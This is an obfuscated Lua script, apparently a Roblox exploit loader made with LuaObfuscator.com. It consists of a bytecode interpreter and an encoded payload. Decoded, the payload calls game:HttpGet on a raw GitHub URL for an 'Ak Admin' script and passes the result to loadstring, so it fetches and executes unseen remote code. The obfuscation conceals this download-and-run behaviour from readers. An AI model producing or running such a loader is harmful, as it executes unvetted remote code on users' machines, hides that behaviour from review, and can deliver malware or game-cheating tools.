--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v118=v5(v88,v19);v19=nil;return v118;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 + (0 -0) ;local v90;while true do if (v89==(0 -0)) then v90=(v31/((5 -3)^(v32-(1 -0))))%((2 + 0)^(((v33-(2 -1)) -(v32-1)) + 1)) ;return v90-(v90%(620 -(555 + 64))) ;end end else local v91=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v91 + v91))>=v91) and (118 -(32 + 85))) or (927 -(214 + 713)) ;end end local function v21() local v34=0 + (0 -0) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + ((352 -(87 + 263)) -1) ;v34=(181 -(67 + 113)) -0 ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==((3 -1) -1)) then return (v38 * (189 + 67)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (954 -(802 + 150)) );v18=v18 + 2 ;v36=2 -1 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1001 -(915 + 82)) ;return (v42 * (47505959 -30728743)) + (v41 * (38178 + 27358)) + (v40 * ((1523 -(1069 + 118)) -80)) + v39 ;end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 -0)) then v46=1 + 0 ;v47=(v20(v45,1 -0 ,20 + 0 + 0 ) * (((281 + 512) -(368 + 423))^32)) + v44 ;v43=6 -4 ;end if (v43==(887 -(261 + 624))) then v48=v20(v45,39 -(10 + 8) ,119 -88 );v49=((v20(v45,474 -(416 + 26) )==(3 -2)) and  -(1 + 0)) or (1 -0) ;v43=441 -(145 + 293) ;end if (v43==(433 -(44 + 386))) then if (v48==((2640 -1154) -(998 + 488))) then if (v47==0) then return v49 * (0 + 0) ;else v48=1 + 0 ;v46=772 -(201 + 571) ;end elseif (v48==(3185 -(116 + 1022))) then return ((v47==(1080 -(1020 + 60))) and (v49 * (((1427 -(630 + 793)) -3)/0))) or (v49 * NaN) ;end return v8(v49,v48-(601 + 422) ) * (v46 + (v47/((7 -(16 -11))^(184 -132)))) ;end if (v43==(859 -(814 + 45))) then v44=v23();v45=v23();v43=(9 -7) -1 ;end end end local function v25(v50) local v51=0 + 0 ;local v52;local v53;while true do if (v51==(3 -2)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=2;end if (v51==0) then v52=nil;if  not v50 then local v125=1747 -(760 + 9 + 978) ;while true do if (v125==(1913 -(1405 + 384 + 124))) then v50=v23();if (v50==0) then return "";end break;end end end v51=767 -(745 + 21) ;end if (v51==2) then v53={};for v119=1 + 0 , #v52 do v53[v119]=v2(v1(v3(v52,v119,v119)));end v51=7 -4 ;end if (v51==(11 -8)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v95=(function() return;end)();while true do if (v92==(1637 -(195 + 1442))) then local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();while true do if (v126~=(0 + 0)) then else v127=(function() return 0;end)();while true do if (v127==1) then v92=(function() return  #":";end)();break;end if (v127~=(0 + 0)) then else v93=(function() return v94();end)();v95=(function() return nil;end)();v127=(function() return 397 -(115 + 281) ;end)();end end break;end end end if (v92~= #"<") then else if (v93== #":") then v95=(function() return v94()~=0 ;end)();elseif (v93==(4 -2)) then v95=(function() return v96();end)();elseif (v93== #"19(") then v95=(function() return v97();end)();end v98[v99]=(function() return v95;end)();break;end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v55=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0 + 0 ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do local v117=(function() return 0 -0 ;end)();while true do if (v117==0) then if (v109==1) then local v130=(function() return 0;end)();while true do if (v130~=0) then else while true do if (v100==0) then v101=(function() return v102();end)();if (v103(v101, #"[", #"{")~=(0 -0)) then else local v186=(function() return 867 -(550 + 317) ;end)();local v187=(function() return;end)();local v188=(function() return;end)();local v189=(function() return;end)();while true do if (v186==(3 -0)) then if (v103(v188, #"xnx", #"91(")== #"[") then v189[ #"0836"]=(function() return v106[v189[ #"http"]];end)();end v107[v108]=(function() return v189;end)();break;end if ((2 -0)==v186) then if (v103(v188, #"{", #"/")== #"}") then v189[5 -3 ]=(function() return v106[v189[2]];end)();end if (v103(v188,287 -(134 + 151) ,2)~= #"|") then else v189[ #"gha"]=(function() return v106[v189[ #"asd"]];end)();end v186=(function() return 3;end)();end if (v186==(1666 -(970 + 695))) then local v191=(function() return 0 -0 ;end)();while true do if (v191==0) then local v196=(function() return 1990 -(582 + 1408) ;end)();while true do if (v196==0) then v189=(function() return {v104(),v104(),nil,nil};end)();if (v187==(0 -0)) then local v197=(function() return 0 -0 ;end)();local v198=(function() return;end)();while true do if (v197==0) then v198=(function() return 0;end)();while true do if ((0 -0)~=v198) then else v189[ #"asd"]=(function() return v104();end)();v189[ #"?id="]=(function() return v104();end)();break;end end break;end end elseif (v187== #":") then v189[ #"91("]=(function() return v105();end)();elseif (v187==(1826 -(1195 + 629))) then v189[ #"asd"]=(function() return v105() -(2^(20 -4)) ;end)();elseif (v187== #"19(") then local v203=(function() return 241 -(187 + 54) ;end)();local v204=(function() return;end)();while true do if (v203==(780 -(162 + 618))) then v204=(function() return 0;end)();while true do if (v204~=0) then else v189[ #"asd"]=(function() return v105() -(2^16) ;end)();v189[ #".dev"]=(function() return v104();end)();break;end end break;end end end v196=(function() return 1 + 0 ;end)();end if (v196~=1) then else v191=(function() return 1 + 0 ;end)();break;end end end if (v191==1) then v186=(function() return 2;end)();break;end end end if (v186~=(0 -0)) then else local v192=(function() return 0;end)();while true do if (v192==(1 -0)) then v186=(function() return 1;end)();break;end if (v192==0) then v187=(function() return v103(v101,1 + 1 , #"19(");end)();v188=(function() return v103(v101, #"?id=",1642 -(1373 + 263) );end)();v192=(function() return 1001 -(451 + 549) ;end)();end end end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end if (v109~=0) then else v100=(function() return 0;end)();v101=(function() return nil;end)();v109=(function() return 1 + 0 ;end)();end break;end end end end;end)();local v56=(function() return function(v110,v111,v112) local v113=(function() return 0;end)();while true do if (v113==(0 -0)) then local v129=(function() return 0 -0 ;end)();while true do if (v129==(1384 -(746 + 638))) then v110[v111-#"}" ]=(function() return v112();end)();return v110,v111,v112;end end end end end;end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {};end)();local v60=(function() return {v57,v58,nil,v59};end)();local v61=(function() return v23();end)();local v62=(function() return {};end)();for v70= #" ",v61 do FlatIdent_52551,Type,v21,Cons,v24,v25,v62,v70=(function() return v54(FlatIdent_52551,Type,v21,Cons,v24,v25,v62,v70);end)();end v60[ #"91("]=(function() return v21();end)();for v71= #"}",v23() do FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v62,v57,v71=(function() return v55(FlatIdent_2661B,Descriptor,v21,v20,v22,v23,v62,v57,v71);end)();end for v72= #".",v23() do v58,v72,v28=(function() return v56(v58,v72,v28);end)();end return v60;end local function v29(v64,v65,v66) local v67=v64[1 + 0 ];local v68=v64[2];local v69=v64[(3 + 1) -1 ];return function(...) local v73=v67;local v74=v68;local v75=v69;local v76=v27;local v77=(1192 -(20 + 830)) -(218 + 123) ;local v78= -((1235 + 347) -(1535 + 46));local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v114=560 -(306 + 254) ,v81 do if ((343<=2689) and (v114>=v75)) then v79[v114-v75 ]=v80[v114 + 1 + 0 ];else v83[v114]=v80[v114 + (1 -0) ];end end local v84=(v81-v75) + (1468 -(899 + 568)) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1 + 0 + 0 ];if (v86<=(7 -4)) then if (v86<=((1342 -(542 + 196)) -(268 + 335))) then if ((v86==(290 -(60 + 230))) or (3313<=1778)) then local v132=v85[574 -(426 + 146) ];local v133,v134=v76(v83[v132](v13(v83,v132 + 1 + 0 ,v85[1459 -(282 + 1174) ])));v78=(v134 + v132) -(812 -(569 + 242)) ;local v135=0 -0 ;for v152=v132,v78 do local v153=0 + 0 ;while true do if (v153==(1024 -(706 + 318))) then v135=v135 + (1252 -(721 + 530)) ;v83[v152]=v133[v135];break;end end end else v83[v85[1273 -(945 + 326) ]]();end elseif (v86>(4 -2)) then v83[v85[2 + 0 ]]=v66[v85[703 -(271 + 429) ]];else local v138=0;local v139;while true do if (v138==(0 -0)) then v139=v85[2 + 0 ];v83[v139]=v83[v139](v13(v83,v139 + (1501 -(1408 + 92)) ,v78));break;end end end elseif (v86<=(1091 -(135 + 326 + 625))) then if (v86>4) then v83[v85[(656 + 634) -(993 + 295) ]]=v85[3]~=0 ;else local v141=v85[1 + 1 ];local v142=v83[v85[1174 -(418 + 753) ]];v83[v141 + 1 + 0 + 0 ]=v142;v83[v141]=v142[v85[1 + 3 ]];end elseif ((v86<=6) or (1869==2009)) then local v146=0;local v147;local v148;local v149;local v150;local v151;while true do if (v146==(3 + 5)) then v85=v73[v77];v83[v85[(2 -1) + 1 ]]();v77=v77 + (530 -((1040 -634) + 123)) ;v85=v73[v77];v146=1778 -(1749 + 20) ;end if (((1552 -(1126 + 425))==v146) or (3546<2322)) then v83[v85[2]]=v66[v85[(406 -(118 + 287)) + 2 ]];v77=v77 + 1 ;v85=v73[v77];v83[v85[1324 -(1249 + 73) ]]=v66[v85[2 + 1 ]];v146=1147 -(466 + 679) ;end if ((v146==(0 -0)) or (1421>=2104)) then v147=nil;v148,v149=nil;v150=nil;v151=nil;v146=2 -1 ;end if (v146==(1905 -(106 + (7030 -5236)))) then v77=v77 + 1 ;v85=v73[v77];v151=v85[1 + 1 ];v148,v149=v76(v83[v151](v13(v83,v151 + 1 + 0 ,v85[(1129 -(118 + 1003)) -5 ])));v146=16 -10 ;end if (v146==((359 -236) -(4 + 110))) then do return;end break;end if (v146==(588 -(57 + 527))) then v83[v85[2]]=v85[1430 -(41 + 1386) ];v77=v77 + 1 ;v85=v73[v77];v83[v85[105 -((394 -(142 + 235)) + 86) ]]=v85[3 + 0 ]~=(0 -(0 -0)) ;v146=14 -9 ;end if ((1812<=3249) and (v146==(172 -(122 + 44)))) then v78=(v149 + v151) -1 ;v147=0 -(0 + 0) ;for v182=v151,v78 do local v183=0 -0 ;while true do if ((0 + 0)==v183) then v147=v147 + 1 + (977 -(553 + 424)) ;v83[v182]=v148[v147];break;end end end v77=v77 + (1 -0) ;v146=7;end if ((v146==3) or (2082==4773)) then v83[v151 + 1 + 0 ]=v150;v83[v151]=v150[v85[7 -3 ]];v77=v77 + (66 -(30 + 0 + 35)) ;v85=v73[v77];v146=3 + 1 ;end if (v146==(1259 -(1043 + 214))) then v77=v77 + (3 -2) ;v85=v73[v77];v151=v85[2];v150=v83[v85[3]];v146=1215 -(323 + 889) ;end if ((1623<=1957) and (7==v146)) then v85=v73[v77];v151=v85[5 -3 ];v83[v151]=v83[v151](v13(v83,v151 + (581 -(361 + 219)) ,v78));v77=v77 + (321 -(53 + 267)) ;v146=2 + 6 ;end end elseif ((3244>1055) and (v86>((245 + 175) -(15 + 398)))) then do return;end else v83[v85[984 -(18 + 964) ]]=v85[11 -8 ];end v77=v77 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F416C696B68612O6D612O732F4D7941646D696E2F6D61696E2F416B25323041646D696E00093O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
